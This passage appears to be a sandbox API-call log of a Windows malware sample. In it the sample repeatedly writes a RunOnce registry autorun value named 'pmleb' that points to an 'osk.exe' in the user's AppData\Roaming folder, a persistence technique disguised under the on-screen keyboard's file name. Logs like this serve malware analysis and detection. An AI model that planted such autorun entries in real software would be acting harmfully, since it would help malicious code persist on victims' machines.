(hWnd=0x20280, uIDEvent=0x211c) returned 1 [0083.144] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.144] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.144] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.145] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.145] RegCloseKey (hKey=0x280) returned 0x0 [0083.145] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.145] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.145] SetTimer (hWnd=0x20280, nIDEvent=0x211d, uElapse=0xa, lpTimerFunc=0x0) returned 0x211d [0083.145] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.153] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.153] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.154] KillTimer (hWnd=0x20280, uIDEvent=0x211d) returned 1 [0083.154] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.154] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.154] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.155] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.155] RegCloseKey (hKey=0x280) returned 0x0 [0083.155] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.155] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.155] SetTimer (hWnd=0x20280, nIDEvent=0x211e, uElapse=0xa, lpTimerFunc=0x0) returned 0x211e [0083.155] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.169] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.169] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.169] KillTimer (hWnd=0x20280, uIDEvent=0x211e) returned 1 [0083.170] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.170] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.170] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.170] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.170] RegCloseKey (hKey=0x280) returned 0x0 [0083.170] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.171] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.171] SetTimer (hWnd=0x20280, nIDEvent=0x211f, uElapse=0xa, lpTimerFunc=0x0) returned 0x211f [0083.171] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.186] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.186] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.186] KillTimer (hWnd=0x20280, uIDEvent=0x211f) returned 1 [0083.186] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.187] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.187] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.187] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.187] RegCloseKey (hKey=0x280) returned 0x0 [0083.187] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.187] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.187] SetTimer (hWnd=0x20280, nIDEvent=0x2120, uElapse=0xa, lpTimerFunc=0x0) returned 0x2120 [0083.187] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.200] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.200] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.200] KillTimer (hWnd=0x20280, uIDEvent=0x2120) returned 1 [0083.201] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.201] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.201] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.201] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.201] RegCloseKey (hKey=0x280) returned 0x0 [0083.202] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.202] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.202] SetTimer (hWnd=0x20280, nIDEvent=0x2121, uElapse=0xa, lpTimerFunc=0x0) returned 0x2121 [0083.202] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.216] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.216] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.216] KillTimer (hWnd=0x20280, uIDEvent=0x2121) returned 1 [0083.217] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.217] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.217] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.217] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.217] RegCloseKey (hKey=0x280) returned 0x0 [0083.218] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.218] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.218] SetTimer (hWnd=0x20280, nIDEvent=0x2122, uElapse=0xa, lpTimerFunc=0x0) returned 0x2122 [0083.218] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.232] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.232] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.232] KillTimer (hWnd=0x20280, uIDEvent=0x2122) returned 1 [0083.232] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.232] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.233] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.233] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.233] RegCloseKey (hKey=0x280) returned 0x0 [0083.233] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.233] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.233] SetTimer (hWnd=0x20280, nIDEvent=0x2123, uElapse=0xa, lpTimerFunc=0x0) returned 0x2123 [0083.233] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.247] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.247] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.247] KillTimer (hWnd=0x20280, uIDEvent=0x2123) returned 1 [0083.247] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.248] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.248] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.248] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.248] RegCloseKey (hKey=0x280) returned 0x0 [0083.249] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.249] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.249] SetTimer (hWnd=0x20280, nIDEvent=0x2124, uElapse=0xa, lpTimerFunc=0x0) returned 0x2124 [0083.249] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.263] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.263] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.263] KillTimer (hWnd=0x20280, uIDEvent=0x2124) returned 1 [0083.263] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.263] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.264] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.264] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.264] RegCloseKey (hKey=0x280) returned 0x0 [0083.264] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.264] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.264] SetTimer (hWnd=0x20280, nIDEvent=0x2125, uElapse=0xa, lpTimerFunc=0x0) returned 0x2125 [0083.264] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.278] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.278] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.279] KillTimer (hWnd=0x20280, uIDEvent=0x2125) returned 1 [0083.279] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.279] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.279] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.280] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.280] RegCloseKey (hKey=0x280) returned 0x0 [0083.280] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.280] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.280] SetTimer (hWnd=0x20280, nIDEvent=0x2126, uElapse=0xa, lpTimerFunc=0x0) returned 0x2126 [0083.280] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.294] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.294] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.294] KillTimer (hWnd=0x20280, uIDEvent=0x2126) returned 1 [0083.295] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.295] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.295] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.295] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.296] RegCloseKey (hKey=0x280) returned 0x0 [0083.296] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.296] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.296] SetTimer (hWnd=0x20280, nIDEvent=0x2127, uElapse=0xa, lpTimerFunc=0x0) returned 0x2127 [0083.296] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.310] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.310] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.310] KillTimer (hWnd=0x20280, uIDEvent=0x2127) returned 1 [0083.310] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.310] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.311] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.311] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.311] RegCloseKey (hKey=0x280) returned 0x0 [0083.311] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.311] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.311] SetTimer (hWnd=0x20280, nIDEvent=0x2128, uElapse=0xa, lpTimerFunc=0x0) returned 0x2128 [0083.311] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.326] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.326] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.326] KillTimer (hWnd=0x20280, uIDEvent=0x2128) returned 1 [0083.326] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.327] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.327] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.327] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.327] RegCloseKey (hKey=0x280) returned 0x0 [0083.327] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.327] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.327] SetTimer (hWnd=0x20280, nIDEvent=0x2129, uElapse=0xa, lpTimerFunc=0x0) returned 0x2129 [0083.327] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.341] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.341] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.341] KillTimer (hWnd=0x20280, uIDEvent=0x2129) returned 1 [0083.341] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.342] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.342] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.342] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.342] RegCloseKey (hKey=0x280) returned 0x0 [0083.342] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.342] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.342] SetTimer (hWnd=0x20280, nIDEvent=0x212a, uElapse=0xa, lpTimerFunc=0x0) returned 0x212a [0083.342] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.356] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.356] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.356] KillTimer (hWnd=0x20280, uIDEvent=0x212a) returned 1 [0083.357] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.357] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.357] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.357] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.358] RegCloseKey (hKey=0x280) returned 0x0 [0083.358] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.358] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.358] SetTimer (hWnd=0x20280, nIDEvent=0x212b, uElapse=0xa, lpTimerFunc=0x0) returned 0x212b [0083.358] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.372] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.372] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.372] KillTimer (hWnd=0x20280, uIDEvent=0x212b) returned 1 [0083.372] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.373] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.373] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.373] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.373] RegCloseKey (hKey=0x280) returned 0x0 [0083.373] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.373] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.373] SetTimer (hWnd=0x20280, nIDEvent=0x212c, uElapse=0xa, lpTimerFunc=0x0) returned 0x212c [0083.373] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.387] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.387] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.388] KillTimer (hWnd=0x20280, uIDEvent=0x212c) returned 1 [0083.388] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.388] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.388] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.389] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.389] RegCloseKey (hKey=0x280) returned 0x0 [0083.389] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.389] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.389] SetTimer (hWnd=0x20280, nIDEvent=0x212d, uElapse=0xa, lpTimerFunc=0x0) returned 0x212d [0083.389] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.403] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.403] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.403] KillTimer (hWnd=0x20280, uIDEvent=0x212d) returned 1 [0083.403] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.404] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.404] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.404] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.404] RegCloseKey (hKey=0x280) returned 0x0 [0083.404] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.404] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.405] SetTimer (hWnd=0x20280, nIDEvent=0x212e, uElapse=0xa, lpTimerFunc=0x0) returned 0x212e [0083.405] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.419] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.419] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.419] KillTimer (hWnd=0x20280, uIDEvent=0x212e) returned 1 [0083.419] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.419] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.419] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.420] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 